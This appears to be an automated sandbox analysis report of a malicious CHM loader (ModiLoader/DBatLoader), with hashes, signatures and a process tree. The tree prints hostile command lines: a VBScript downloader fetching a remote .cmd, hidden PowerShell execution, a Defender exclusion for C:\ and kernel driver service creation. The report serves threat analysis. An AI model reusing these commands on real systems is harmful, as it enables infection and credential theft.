Analysis
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21/01/2025, 03:36

Static task: static1

Behavioral task: behavioral1
Sample: a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
Resource: win10v2004-20241007-en

General
Target: a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
Size: 75KB
MD5: 92588daadcf11b3311b82e8b20219340
SHA1: 68c690da91c4a1cb0e7336b055ea87877a7b8b9d
SHA256: a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101
SHA512: 38fa50cfad7f030712b9c8a81af995b0319075aa5e9ba3768d799bf13aa0532130d491bb6d90d0c8fbc2e8ffacc31e85629152d3281d4818eb8716d0f16cd523
SSDEEP: 1536:PRReoi9mRqozQM8I3FInJQqcN8HSsIN2i5reqgdMb0OYqFHPf:5Rez9kTAoFI7jq2i6qgGbzYOn
Malware Config
Signatures
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

Modiloader family
ModiLoader Second Stage 61 IoCs
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run PowerShell and hide display window.
pid process
112 powershell.exe
1844 powershell.exe
Executes dropped EXE 32 IoCs
pid process
4400 ript.exe
2344 x.exe
1928 svchost.pif
3304 alpha.pif
2228 Upha.pif
1980 alpha.pif
1608 Upha.pif
4312 alpha.pif
2248 aken.pif
2548 xbnitqnH.pif
4512 alg.exe
1056 DiagnosticsHub.StandardCollector.Service.exe
5704 fxssvc.exe
5844 elevation_service.exe
6016 elevation_service.exe
6100 maintenanceservice.exe
2596 msdtc.exe
2432 OSE.EXE
3716 PerceptionSimulationService.exe
4740 perfhost.exe
5048 locator.exe
2416 SensorDataService.exe
3576 snmptrap.exe
2168 spectrum.exe
2688 ssh-agent.exe
5500 TieringEngineService.exe
4796 AgentService.exe
2248 vds.exe
4372 vssvc.exe
5144 wbengine.exe
5220 WmiApSrv.exe
5388 SearchIndexer.exe
Loads dropped DLL 1 IoCs
pid process
1928 svchost.pif
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description / ioc / process
Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 xbnitqnH.pif
Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 xbnitqnH.pif
Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 xbnitqnH.pif
Adds Run key to start application 2 TTPs 1 IoCs
description / ioc / process
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hnqtinbx = "C:\\Users\\Public\\Hnqtinbx.url" x.exe
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid process
1260 cmd.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow / ioc
23 drive.google.com
27 drive.google.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow / ioc
39 checkip.dyndns.org
47 reallyfreegeoip.org
48 reallyfreegeoip.org
Drops file in System32 directory 31 IoCs
Suspicious use of SetThreadContext 1 IoCs
description / pid / process / procid_target
PID 2344 set thread context of 2548 2344 x.exe 116
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 3 IoCs
description / ioc / process
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe xbnitqnH.pif
File opened for modification C:\Windows\DtcInstall.log msdtc.exe
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe alg.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description / ioc / process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xbnitqnH.pif
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description / ioc / process
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TieringEngineService.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz TieringEngineService.exe
Kills process with taskkill 1 IoCs
pid process
1016 taskkill.exe
Modifies data under HKEY_USERS 64 IoCs
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc
HTTP User-Agent header, flow 27: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header, flow 29: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: LoadsDriver 3 IoCs
pid Process
656 Process not Found
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process (repeated identical events collapsed)
Token: SeDebugPrivilege 112 powershell.exe
Token: SeDebugPrivilege 1844 powershell.exe
Token: SeDebugPrivilege 1016 taskkill.exe
Token: SeDebugPrivilege 2248 aken.pif
Token: SeTakeOwnershipPrivilege 2548 xbnitqnH.pif
Token: SeDebugPrivilege 2548 xbnitqnH.pif
Token: SeAuditPrivilege 5704 fxssvc.exe
Token: SeRestorePrivilege 5500 TieringEngineService.exe
Token: SeManageVolumePrivilege 5500 TieringEngineService.exe
Token: SeAssignPrimaryTokenPrivilege 4796 AgentService.exe
Token: SeBackupPrivilege 4372 vssvc.exe
Token: SeRestorePrivilege 4372 vssvc.exe
Token: SeAuditPrivilege 4372 vssvc.exe
Token: SeBackupPrivilege 5144 wbengine.exe
Token: SeRestorePrivilege 5144 wbengine.exe
Token: SeSecurityPrivilege 5144 wbengine.exe
Token: 33 5388 SearchIndexer.exe
Token: SeIncBasePriorityPrivilege 5388 SearchIndexer.exe
Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process
3748 hh.exe
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target (repeated identical events collapsed)
PID 3748 wrote to memory of 1260 (hh.exe, procid_target 82)
PID 1260 wrote to memory of 3640 (cmd.exe, procid_target 84)
PID 1260 wrote to memory of 112 (cmd.exe, procid_target 85)
PID 112 wrote to memory of 4400 (powershell.exe, procid_target 86)
PID 1260 wrote to memory of 1844 (cmd.exe, procid_target 87)
PID 1844 wrote to memory of 4672 (powershell.exe, procid_target 88)
PID 1260 wrote to memory of 1016 (cmd.exe, procid_target 90)
PID 4672 wrote to memory of 1980 (cmd.exe, procid_target 92)
PID 4672 wrote to memory of 2344 (cmd.exe, procid_target 93)
PID 2344 wrote to memory of 3452 (x.exe, procid_target 100)
PID 2344 wrote to memory of 3600 (x.exe, procid_target 102)
PID 3600 wrote to memory of 1928 (cmd.exe, procid_target 104)
PID 1928 wrote to memory of 1804 (svchost.pif, procid_target 105)
PID 1804 wrote to memory of 4680 (cmd.exe, procid_target 107)
PID 1804 wrote to memory of 4944 (cmd.exe, procid_target 108)
PID 1804 wrote to memory of 1588 (cmd.exe, procid_target 109)
PID 1804 wrote to memory of 3304 (cmd.exe, procid_target 110)
PID 3304 wrote to memory of 2228 (alpha.pif, procid_target 117)
PID 1804 wrote to memory of 1980 (cmd.exe, procid_target 112)
PID 1980 wrote to memory of 1608 (alpha.pif, procid_target 113)
PID 1804 wrote to memory of 4312 (cmd.exe, procid_target 114)
PID 4312 wrote to memory of 2248 (alpha.pif, procid_target 139)
PID 2344 wrote to memory of 2548 (x.exe, procid_target 116)
PID 5388 wrote to memory of 3464 (SearchIndexer.exe, procid_target 145)
PID 5388 wrote to memory of 6040 (SearchIndexer.exe, procid_target 146)
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 xbnitqnH.pif -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 xbnitqnH.pif
Processes (tree depth shown in brackets; children are indented under their parent)

[1] PID 3748  C:\Windows\hh.exe
    Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  [2] PID 1260  C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
      - Hide Artifacts: Hidden Window
      - Suspicious use of WriteProcessMemory
    [3] PID 3640  C:\Windows\system32\extrac32.exe
        Command line: extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    [3] PID 112  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] PID 4400  C:\Users\Public\ript.exe
          Command line: "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd
          - Executes dropped EXE
    [3] PID 1844  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] PID 4672  C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\df.cmd" "
          - Suspicious use of WriteProcessMemory
        [5] PID 1980  C:\Windows\system32\extrac32.exe
            Command line: extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        [5] PID 2344  C:\Users\Admin\AppData\Local\Temp\x.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\x.exe"
            - Executes dropped EXE
            - Adds Run key to start application
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
          [6] PID 3452  C:\Windows\SysWOW64\cmd.exe
              Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\HnqtinbxF.cmd" "
              - System Location Discovery: System Language Discovery
          [6] PID 3600  C:\Windows\SysWOW64\cmd.exe
              Command line: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              - System Location Discovery: System Language Discovery
              - Suspicious use of WriteProcessMemory
            [7] PID 1928  C:\Windows \SysWOW64\svchost.pif
                Command line: "C:\Windows \SysWOW64\svchost.pif"
                - Executes dropped EXE
                - Loads dropped DLL
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of WriteProcessMemory
              [8] PID 1804  C:\Windows\system32\cmd.exe
                  Command line: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
                  - Suspicious use of WriteProcessMemory
                [9] PID 4680  C:\Windows\system32\extrac32.exe
                    Command line: extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif
                [9] PID 4944  C:\Windows\system32\extrac32.exe
                    Command line: extrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif
                [9] PID 1588  C:\Windows\system32\extrac32.exe
                    Command line: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif
                [9] PID 3304  C:\Users\Public\alpha.pif
                    Command line: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
                    - Executes dropped EXE
                    - Suspicious use of WriteProcessMemory
                  [10] PID 2228  C:\Users\Public\Upha.pif
                       Command line: C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
                       - Executes dropped EXE
                [9] PID 1980  C:\Users\Public\alpha.pif
                    Command line: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight
                    - Executes dropped EXE
                    - Suspicious use of WriteProcessMemory
                  [10] PID 1608  C:\Users\Public\Upha.pif
                       Command line: C:\\Users\\Public\\Upha.pif start TrueSight
                       - Executes dropped EXE
                [9] PID 4312  C:\Users\Public\alpha.pif
                    Command line: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
                    - Executes dropped EXE
                    - Suspicious use of WriteProcessMemory
                  [10] PID 2248  C:\Users\Public\aken.pif
                       Command line: C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
                       - Executes dropped EXE
                       - Suspicious behavior: EnumeratesProcesses
                       - Suspicious use of AdjustPrivilegeToken
          [6] PID 2548  C:\Users\Public\Libraries\xbnitqnH.pif
              Command line: C:\Users\Public\Libraries\xbnitqnH.pif
              - Executes dropped EXE
              - Accesses Microsoft Outlook profiles
              - Drops file in System32 directory
              - Drops file in Program Files directory
              - Drops file in Windows directory
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - outlook_office_path
              - outlook_win_path
    [3] PID 1016  C:\Windows\system32\taskkill.exe
        Command line: taskkill /F /IM hh.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

[1] PID 2228  C:\Windows\System32\sihclient.exe
    Command line: C:\Windows\System32\sihclient.exe /cv 76g63deg0k6CYsDtk47YKA.0.2

[1] PID 4512  C:\Windows\System32\alg.exe
    Command line: C:\Windows\System32\alg.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory

[1] PID 1056  C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
    Command line: C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
    - Executes dropped EXE

[1] PID 2544  C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv

[1] PID 5704  C:\Windows\system32\fxssvc.exe
    Command line: C:\Windows\system32\fxssvc.exe
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken

[1] PID 5844  C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
    Command line: "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
    - Executes dropped EXE

[1] PID 6016  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
    - Executes dropped EXE

[1] PID 6100  C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
    Command line: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
    - Executes dropped EXE

[1] PID 2596  C:\Windows\System32\msdtc.exe
    Command line: C:\Windows\System32\msdtc.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory

[1] PID 2432  \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
    Command line: "c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
    - Executes dropped EXE

[1] PID 3716  C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
    Command line: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
    - Executes dropped EXE

[1] PID 4740  C:\Windows\SysWow64\perfhost.exe
    Command line: C:\Windows\SysWow64\perfhost.exe
    - Executes dropped EXE

[1] PID 5048  C:\Windows\system32\locator.exe
    Command line: C:\Windows\system32\locator.exe
    - Executes dropped EXE

[1] PID 2416  C:\Windows\System32\SensorDataService.exe
    Command line: C:\Windows\System32\SensorDataService.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)

[1] PID 3576  C:\Windows\System32\snmptrap.exe
    Command line: C:\Windows\System32\snmptrap.exe
    - Executes dropped EXE

[1] PID 2168  C:\Windows\system32\spectrum.exe
    Command line: C:\Windows\system32\spectrum.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)

[1] PID 2688  C:\Windows\System32\OpenSSH\ssh-agent.exe
    Command line: C:\Windows\System32\OpenSSH\ssh-agent.exe
    - Executes dropped EXE

[1] PID 5376  C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc

[1] PID 5500  C:\Windows\system32\TieringEngineService.exe
    Command line: C:\Windows\system32\TieringEngineService.exe
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious use of AdjustPrivilegeToken

[1] PID 4796  C:\Windows\system32\AgentService.exe
    Command line: C:\Windows\system32\AgentService.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[1] PID 2248  C:\Windows\System32\vds.exe
    Command line: C:\Windows\System32\vds.exe
    - Executes dropped EXE

[1] PID 4372  C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[1] PID 5144  C:\Windows\system32\wbengine.exe
    Command line: "C:\Windows\system32\wbengine.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[1] PID 5220  C:\Windows\system32\wbem\WmiApSrv.exe
    Command line: C:\Windows\system32\wbem\WmiApSrv.exe
    - Executes dropped EXE

[1] PID 5388  C:\Windows\system32\SearchIndexer.exe
    Command line: C:\Windows\system32\SearchIndexer.exe /Embedding
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] PID 3464  C:\Windows\system32\SearchProtocolHost.exe
      Command line: "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
      - Modifies data under HKEY_USERS
  [2] PID 6040  C:\Windows\system32\SearchFilterHost.exe
      Command line: "C:\Windows\system32\SearchFilterHost.exe" 0 912 916 924 8192 920 896
      - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15 (count of matching signatures in parentheses)
- Privilege Escalation
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
- Credential Access
  - Credentials from Password Stores (1)
    - Credentials from Web Browsers (1)
  - Unsecured Credentials (2)
    - Credentials In Files (2)
Downloads
-
Filesize
171KB
MD522331abcc9472cc9dc6f37faf333aa2c
SHA12a001c30ba79a19ceaf6a09c3567c70311760aa4
SHA256bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c
SHA512c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c
-
Filesize
70KB
MD53fb5cf71f7e7eb49790cb0e663434d80
SHA1b4979a9f970029889713d756c3f123643dde73da
SHA25641f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9
SHA5122b59a6d0afef765c6ca80b5738202622cfe0dffcec2092d23ad8149156b0b1dca479e2e2c8562639c97e9f335429854cad12461f2fb277207c39d12e3e308ef5
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
194B
MD571efa4ec6c67fa5665b1d0c64d60fc25
SHA1f546eda2b94df327b7ad5fa5bb0ba20cd37b2623
SHA25608212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898
SHA5127b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
988KB
MD53353a1cc2a5dabca2e40faa9d5520cf4
SHA1a98b8be630118989f3beceecc34fd524dae0f05c
SHA2565c1f323caf7247e020dcfcd4cfc413afb6a19828fd4f9099c24f3635c62c8698
SHA512fa4e3f1c4b7dfcc66c6c4d8fd2a91821d5a06bc9c282b03b15392e1bb6175d2679837a8d3143bf7b32ed252bacd8c295337a2fec11cefc3deda70a02215d4930
-
Filesize
157KB
MD524590bf74bbbbfd7d7ac070f4e3c44fd
SHA1cdfe517d07f18623778829aa98d6bbadd3f294cd
SHA256ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03
SHA512ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9
-
Filesize
116KB
MD50f088756537e0d65627ed2ea392dcaae
SHA1983eb3818223641c13464831a2baad9466c3750f
SHA256abe2b86bc07d11050451906dc5c6955e16341912a1da191fc05b80c6e2f44ad6
SHA512d7ec6126467fd2300f2562be48d302513a92cee328470bf0b25b67dcf646ba6c824cd6195ba056b543db9e2a445991fe31ebc2f89d9eff084907d6af1384720d
-
Filesize
94KB
MD5869640d0a3f838694ab4dfea9e2f544d
SHA1bdc42b280446ba53624ff23f314aadb861566832
SHA2560db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA5126e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7
-
Filesize
1.1MB
MD53c34b05eb4bc2984a8d0a0c0bd704bd1
SHA1e950499cdb73bf52cd0999e22f401c5fa40f86a7
SHA256b9dccaaccb25b3b060d7d807b50527e4020699cc6f20256b58cba3c0ef8fb41f
SHA512099075840bf26f7d86858a7f00061ccad2847608d262459b100d61703b0e5e41153613b522d596c55f46dbfff1ad755e107cc2659b63745803e2b741fb0b7e66
-
Filesize
1.7MB
MD5342deb7562dc099a2563bb874fef1cd8
SHA1b315de9937f86f886b6ba65da6df54ad9a79e1e9
SHA2569d1515b90ff6e12a9cf6ababc0c23fde93ab8fc73cdc99aadbec7b096edef0a5
SHA5122c88ec57d276bafb92643343049f2f1eae05183c79125dab8f0dfbab045ace8ff96e1450ec20d44c350fb348f8ac2d9ff220d9285eb52ae7b7f33536a7bd8624
-
Filesize
1.2MB
MD52c4a01c76c6950cb9899d0346752057f
SHA179f277f2520dabada8c2790715602a7faf821a1a
SHA256e1c05e126f87b7101298b38a3e3bb282643866ca802096e5c6aa7b1baca2c021
SHA5121c2efce34aec00958eaaa168465894f47a513ec1a40c832212c8327d77e2de87e556ca6d8eaffa26ace11f803d9dfd0f83b104dd6cc7d4dbbc89064c620008c8
-
Filesize
1.2MB
MD50bcc85ec3239078929e14c0d2527b36c
SHA1d81ee7278350663642ff0ebdc2cd6156def2e00b
SHA256f3cd52aa735372632b18a6a826a2f6f5dd6c260063683086f763055ed07eadc6
SHA5124913507a7ef21e30371ed2f2744460048ff7fe683a69dc0dad71ad2560e4722d479468d2758df87635c4b2b19732372601cbe8ff3229c48d439709943ce06fc0
-
Filesize
1.1MB
MD5a0c662edec21472e697602173e2ecdc8
SHA1fd863a1f59c444432bac7755ae8f5136c48226d2
SHA256507f13982b68669329c69b43aa8468af02b083acd1d82c5039ae3e5014bda3fe
SHA5123e2771a60b0e7b0952bbdc7040364c95fa60c60916b5380b9d7fff6fe0ec87b5cdecbfb4250403cd8c71a92834ddcaadbd1506a7eabfeb8951a32d09a63d47ce
-
Filesize
1.4MB
MD584184880f038346eb47f52c1420e8c1c
SHA1cdd4cf9dc347e49d46b1c411c18dde04c9c12253
SHA256a71bbe6834b828fcb77deb4fe1c8a10fb2e00172254ce09c0930d518c987a30a
SHA5120fa7a7dc82e380803c9aa68c2788b7562627a58ffdaad22eca36791dbfaf34bb52cc622323ea4e0b645fd5e9d966469fffd7273b1dd2b264a0659784e07f0832
-
Filesize
1.2MB
MD562f11db8d0ef3bf5dd32afcdad4e15d1
SHA1b5c8527db52ac0d567a1aa89da66a8a0f581ad60
SHA25602fe9273d6e80a41f6f261ab4ac8810763eede0276819b9d909e20e74f24f071
SHA5122b191096d9838581a41fe818369fa5ad883db0696fbc9bc3e56f4b3af9e999f7dc4a7be16467400231d7213eac1132658494ec16873bec6606c46e718908f41b
-
Filesize
1.4MB
MD515b4843c38c9d285eeab291dc1dcb3d2
SHA1595d3ac2b756e478cc2855ad295420847e4be883
SHA256704dc8dbfde0e7431fa0a6a1a934271edba7f8a87d400a4d69b3c09629a73c4d
SHA512f526939fd8bf5bd1b5d0699dec9e1adf336e40b9d4875a40f69056d09f96ed21e46a8e2ea622cba3fd5d3db04613556a31c59d204d2fe888539f00faa49a52e8
-
Filesize
1.8MB
MD5313c025b2ba79d15ac1c4a02bc71b1de
SHA1b0eeb502048100c97c82a9a59dfddf908559e8e1
SHA2560eaeb3f6c709195c4841283531485100ad6b9ec7d668c8d68e17ce3084adb073
SHA512f38cb251a3a15ad9df0f76d579409412d9d1d198a5771b9e219feeb2db7febc64a66258d22528e5ea85aba11218f61de929ce7758853233333257c38dcf01ebe
-
Filesize
1.4MB
MD5216c629ab87231f6e9f28d3b5aae1a03
SHA13ac2e6b6a4a25ba6063ede471d3cc4d9ac2f5121
SHA256aefbe417162a622d996295db54256c9c2dfde28b19cf74bb6492841f72bd1ce8
SHA512657a450e4c18cd05a5519dba2f064ce27d0aad0d3b29cbf80a1fd1249a22eb5d389c19505dc1a0642b4039bc768c4485125485a08d0d7d3982613eb4e81c9c5a
-
Filesize
1.4MB
MD51ef0f4ede8e031caf81e002c11648aa6
SHA18a76daf1533a4035f542066c152751176a7fb5bf
SHA256457785a77fd8d3cb084f78bd99791870f015034718d231b64f8316ca0c6e0cab
SHA512f3e6ad25c88906a103a723bf6cdfd546edfecb19c4e37bc8ebfb46a1419d414fb6a4988b9a8c16c427ce9cf5d842e3ac40265d2dd45eb69b66392ca2f86768ee
-
Filesize
2.0MB
MD51a988c56802d49f21e8fce4f83035b7c
SHA1f073c3b83cfb7f8b267f0da3d38752c2a8ee2c43
